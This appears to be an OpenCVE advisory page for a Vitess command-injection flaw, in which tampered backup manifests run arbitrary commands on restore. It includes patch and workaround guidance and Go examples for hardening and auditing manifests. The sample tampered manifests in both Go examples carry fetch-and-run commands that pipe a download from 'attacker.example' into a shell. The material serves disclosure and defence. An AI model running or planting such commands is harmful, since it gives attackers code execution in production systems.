Description
Vitess is a database clustering system for horizontal scaling of MySQL. Prior to versions 23.0.3 and 22.0.4, anyone with read/write access to the backup storage location (e.g. an S3 bucket) can manipulate backup manifest files so that arbitrary code is later executed when that backup is restored. This can be used to provide that attacker with unintended/unauthorized access to the production deployment environment — allowing them to access information available in that environment as well as run any additional arbitrary commands there. Versions 23.0.3 and 22.0.4 contain a patch. Some workarounds are available. Those who intended to use an external decompressor then can always specify that decompressor command in the `--external-decompressor` flag value for `vttablet` and `vtbackup`. That then overrides any value specified in the manifest file. Those who did not intend to use an external decompressor, nor an internal one, can specify a value such as `cat` or `tee` in the `--external-decompressor` flag value for `vttablet` and `vtbackup` to ensure that a harmless command is always used.
Published: 2026-02-26
Score: 8.4 High (CVSS v4.0, from the GitHub advisory; NVD's CVSS v3.1 rating is 9.9 Critical)
EPSS: < 1% Very Low
KEV: No
Impact: Remote Code Execution and Unauthorized Access
Action: Immediate Patch
AI Analysis

Impact

Vitess versions prior to 23.0.3 and 22.0.4 record the external decompressor command in each backup's manifest and, at restore time, execute whatever command the manifest names. An attacker who can write to the backup storage location (an S3 bucket, for example) can therefore edit the manifest so that the restoring `vttablet` or `vtbackup` process runs a command of the attacker's choosing. The result is arbitrary code execution on the restoring host inside the Vitess deployment, giving the attacker access to production data and the ability to run further commands there. The root cause is that the manifest, a file anyone with bucket write access can edit, is trusted as the source of an executable command (CWE-78, OS command injection).
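The precedence described above, as an added example that is not Vitess's own code: a minimal manifest type with the one field this advisory is about (the JSON key name `ExternalDecompressor` and the `MANIFEST` layout are assumptions, not copied from the project), the unpatched resolution order the advisory describes (operator flag wins if set, otherwise the manifest's command is used as-is), and one way to harden it. The allowlist and the shell-metacharacter check are an illustrative hardening pattern, not a description of the upstream patch. Both sample manifests are constructed; the tampered command is a placeholder, not a real payload.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strings"
)

// manifest models only the field this advisory is about. It is an illustration,
// not Vitess's own manifest type, which carries many more fields.
type manifest struct {
	BackupMethod         string `json:"BackupMethod"`
	CompressionEngine    string `json:"CompressionEngine"`
	ExternalDecompressor string `json:"ExternalDecompressor"`
}

// Constructed sample manifests. The second is what a bucket writer could leave
// behind: the command string is a placeholder, not a real payload.
const legitManifest = `{"BackupMethod":"builtin","CompressionEngine":"external","ExternalDecompressor":"zstd -d"}`
const tamperedManifest = `{"BackupMethod":"builtin","CompressionEngine":"external","ExternalDecompressor":"sh -c 'curl http://attacker.example/x | sh'"}`

func parseManifest(data string) (manifest, error) {
	var m manifest
	err := json.Unmarshal([]byte(data), &m)
	return m, err
}

// resolveVulnerable reproduces the precedence the advisory describes for
// unpatched builds: the operator's --external-decompressor flag wins if set,
// otherwise the manifest's command is used as-is. With the flag unset, whoever
// can write the bucket picks the binary the restoring tablet will execute.
func resolveVulnerable(m manifest, flagValue string) string {
	if flagValue != "" {
		return flagValue
	}
	return m.ExternalDecompressor // "" means the built-in engine
}

// approvedDecompressors is an operator-maintained allowlist of bare binary names
// a manifest may name (assumption: these are the decompressors used at this site).
var approvedDecompressors = map[string]bool{
	"zstd": true, "pigz": true, "gzip": true, "lz4": true, "cat": true,
}

// resolveHardened keeps flag precedence but no longer trusts the manifest blindly:
// a manifest command is accepted only if it is a plain argv list with no shell
// metacharacters and its argv[0] is exactly an allowlisted name (no paths, so the
// attacker cannot point at a binary they dropped elsewhere).
func resolveHardened(m manifest, flagValue string) (string, error) {
	if flagValue != "" {
		return flagValue, nil
	}
	cmd := m.ExternalDecompressor
	if cmd == "" {
		return "", nil // built-in engine, nothing external to run
	}
	if strings.ContainsAny(cmd, "|;&$`<>()\\\"'\n") {
		return "", fmt.Errorf("manifest decompressor %q contains shell metacharacters", cmd)
	}
	argv := strings.Fields(cmd)
	if len(argv) == 0 || !approvedDecompressors[argv[0]] {
		return "", fmt.Errorf("manifest decompressor %q is not on the allowlist", cmd)
	}
	return cmd, nil
}

func main() {
	tampered, err := parseManifest(tamperedManifest)
	if err != nil {
		panic(err)
	}
	fmt.Printf("unpatched, flag unset: would run %q\n", resolveVulnerable(tampered, ""))
	fmt.Printf("unpatched, flag=cat:   would run %q\n", resolveVulnerable(tampered, "cat"))
	if _, err := resolveHardened(tampered, ""); err != nil {
		fmt.Println("hardened, flag unset:  refused:", err)
	}
}
```

The second print line is the workaround from the advisory in miniature: once the flag is set, the manifest contents are irrelevant even on an unpatched build. The hardened resolver only matters for the case the workaround does not cover, an operator who leaves the flag unset and still wants the manifest to be able to name a decompressor.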

Affected Systems

The affected product is Vitess, recorded under both the Linux Foundation and VitessIO vendor names. Per the advisory, every 22.x release before 22.0.4 and every 23.x release before 23.0.3 is vulnerable; 22.0.4 and 23.0.3 contain the fix. The NVD CPE entry (cpe:2.3:a:linuxfoundation:vitess:*:*:*:*:*:*:*:*) is unbounded, and the description says "prior to" the fixed versions, so deployments on older release lines should assume they are affected as well.

Risk and Exploitability

Two scores are on record: the GitHub advisory's CVSS v4.0 vector rates the flaw 8.4 (High), while NVD's CVSS v3.1 vector rates it 9.9 (Critical). The v4 vector's PR:H and UI:P components reflect the two preconditions: the attacker first needs write access to the backup store, and a restore has to take place before the planted command runs. The EPSS score below 1 percent indicates a low observed likelihood of exploitation at the time of this report, and the vulnerability is not listed in the CISA KEV catalog. Neither measure reduces the exposure for an operator whose bucket credentials are broadly shared: once write access is obtained the attacker does not need to trigger the restore themselves, because restores happen in the ordinary course of running Vitess (bringing up a replacement tablet from backup, routine `vtbackup` runs), and the injected command then executes on the restoring host with the privileges of the `vttablet` or `vtbackup` process. No network access to the Vitess cluster itself is required beyond what is needed to reach the storage location; this is a storage-permission problem that surfaces as code execution in production.

Generated by OpenCVE AI on April 18, 2026 at 10:26 UTC.

Remediation

The vendor has released fixed versions 22.0.4 and 23.0.3. As an interim workaround, set `--external-decompressor` explicitly on every `vttablet` and `vtbackup`: to the decompressor command you actually use, or to a harmless command such as `cat` or `tee` if your backups rely on neither an external nor a built-in decompressor. An explicitly set flag overrides whatever the manifest contains.

OpenCVE Recommended Actions

  • Upgrade Vitess to 22.0.4 or 23.0.3, the releases that contain the fix for the command injection flaw.
  • If an upgrade is not immediately possible, set `--external-decompressor` explicitly on every `vttablet` and `vtbackup` so the manifest value is never consulted: to the decompressor command you actually use, or to a harmless command such as `cat` or `tee` only when your backups use neither an external nor a built-in decompressor (otherwise the restore would be fed still-compressed data).
  • Restrict write permissions on the backup storage bucket to the identities that take backups; give restore hosts and everyone else read-only or least-privilege access. Bucket versioning or object lock makes a tampered manifest detectable and revertible.
  • Before restoring any backup taken while the storage was writable by more than the backup identities, inspect its manifest and treat an external decompressor value you did not configure as a sign of tampering; do not restore such a backup on an unpatched build.
  • Monitor backup storage access logs for unexpected writes to manifest files or unusual restore activity.
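The manifest inspection recommended above, as an added example that is not Vitess's own tooling: an audit that walks a backup tree (a local mirror of the bucket, or any `fs.FS` such as one backed by an object-store client) and reports every `MANIFEST` whose external decompressor is not exactly the value the operator configured, plus any manifest that no longer parses. The `MANIFEST` file name, the `ExternalDecompressor` JSON key and the keyspace/shard/backup directory layout are assumptions about the on-disk format; the sample tree is constructed, and the tampered command is a placeholder rather than a real payload.

```go
package main

import (
	"encoding/json"
	"fmt"
	"io/fs"
	"path"
	"testing/fstest"
)

// Only the field relevant to the advisory is decoded; unknown keys are ignored,
// so this also works on real manifests that carry more fields. The key name is
// an assumption, not copied from the project.
type backupManifest struct {
	ExternalDecompressor string `json:"ExternalDecompressor"`
}

type finding struct {
	Path         string
	Decompressor string
	Reason       string
}

// auditManifests walks a backup tree and reports every MANIFEST whose
// ExternalDecompressor is not exactly the value the operator configured.
// expected == "" means "no external decompressor is ever expected".
func auditManifests(fsys fs.FS, expected string) ([]finding, error) {
	var findings []finding
	err := fs.WalkDir(fsys, ".", func(p string, d fs.DirEntry, walkErr error) error {
		if walkErr != nil {
			return walkErr
		}
		if d.IsDir() || path.Base(p) != "MANIFEST" {
			return nil
		}
		data, err := fs.ReadFile(fsys, p)
		if err != nil {
			return err
		}
		var m backupManifest
		if err := json.Unmarshal(data, &m); err != nil {
			// A manifest that does not parse is also worth a look: it may have
			// been overwritten or truncated.
			findings = append(findings, finding{p, "", "manifest does not parse: " + err.Error()})
			return nil
		}
		if m.ExternalDecompressor != expected {
			findings = append(findings, finding{p, m.ExternalDecompressor, "decompressor differs from configured value"})
		}
		return nil
	})
	return findings, err
}

// sampleBackups builds a constructed backup tree in memory. The layout
// (keyspace/shard/backup-name/MANIFEST) is illustrative only.
func sampleBackups() fs.FS {
	return fstest.MapFS{
		"ks1/0/2026-02-20.010000.zone1-0000000100/MANIFEST":       &fstest.MapFile{Data: []byte(`{"BackupMethod":"builtin","ExternalDecompressor":"zstd -d"}`)},
		"ks1/0/2026-02-20.010000.zone1-0000000100/backup.tar.zst": &fstest.MapFile{Data: []byte("constructed placeholder, not a real archive")},
		"ks1/0/2026-02-24.010000.zone1-0000000100/MANIFEST":       &fstest.MapFile{Data: []byte(`{"BackupMethod":"builtin","ExternalDecompressor":"bash -c 'curl http://attacker.example/x | bash'"}`)},
		"ks1/1/2026-02-24.010000.zone1-0000000200/MANIFEST":       &fstest.MapFile{Data: []byte(`{"BackupMethod":"builtin"}`)},
		"ks1/1/2026-02-25.010000.zone1-0000000200/MANIFEST":       &fstest.MapFile{Data: []byte(`not json`)},
	}
}

func main() {
	// The operator on this site restores with "zstd -d"; anything else is suspect.
	findings, err := auditManifests(sampleBackups(), "zstd -d")
	if err != nil {
		panic(err)
	}
	for _, f := range findings {
		fmt.Printf("%s: %s (ExternalDecompressor=%q)\n", f.Path, f.Reason, f.Decompressor)
	}
}
```

Run it against a copy of the bucket synced to local disk with `os.DirFS`, or wrap an S3 client in an `fs.FS`. A non-empty report for a backup you are about to restore is the signal to stop and compare against the storage access logs before going further.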


Advisories
Source: GitHub GHSA
ID: GHSA-8g8j-r87h-p36x
Title: Vitess users with backup storage access can gain unauthorized access to production deployment environments
History

Mon, 02 Mar 2026 18:45:00 +0000

Values added (nothing removed):
  First Time appeared: Linuxfoundation; Linuxfoundation vitess
  CPEs: cpe:2.3:a:linuxfoundation:vitess:*:*:*:*:*:*:*:*
  Vendors & Products: Linuxfoundation; Linuxfoundation vitess
  Metrics: cvssV3_1 {'score': 9.9, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H'}


Thu, 26 Feb 2026 13:30:00 +0000

Values added (nothing removed):
  First Time appeared: Vitessio; Vitessio vitess
  Vendors & Products: Vitessio; Vitessio vitess

Thu, 26 Feb 2026 02:15:00 +0000

Values added (nothing removed):
  Description: Vitess is a database clustering system for horizontal scaling of MySQL. Prior to versions 23.0.3 and 22.0.4, anyone with read/write access to the backup storage location (e.g. an S3 bucket) can manipulate backup manifest files so that arbitrary code is later executed when that backup is restored. This can be used to provide that attacker with unintended/unauthorized access to the production deployment environment — allowing them to access information available in that environment as well as run any additional arbitrary commands there. Versions 23.0.3 and 22.0.4 contain a patch. Some workarounds are available. Those who intended to use an external decompressor then can always specify that decompressor command in the `--external-decompressor` flag value for `vttablet` and `vtbackup`. That then overrides any value specified in the manifest file. Those who did not intend to use an external decompressor, nor an internal one, can specify a value such as `cat` or `tee` in the `--external-decompressor` flag value for `vttablet` and `vtbackup` to ensure that a harmless command is always used.
  Title: Vitess users with backup storage access can gain unauthorized access to production deployment environments
  Weaknesses: CWE-78
  References:
  Metrics: cvssV4_0 {'score': 8.4, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:H/VI:H/VA:L/SC:L/SI:L/SA:L'}


MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-02-26T19:32:59.874Z

Reserved: 2026-02-25T03:24:57.793Z

Link: CVE-2026-27965

Vulnrichment

No data.

NVD

Status: Analyzed

Published: 2026-02-26T02:16:23.647

Modified: 2026-03-02T18:36:24.300

Link: CVE-2026-27965

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-18T10:30:35Z

Weaknesses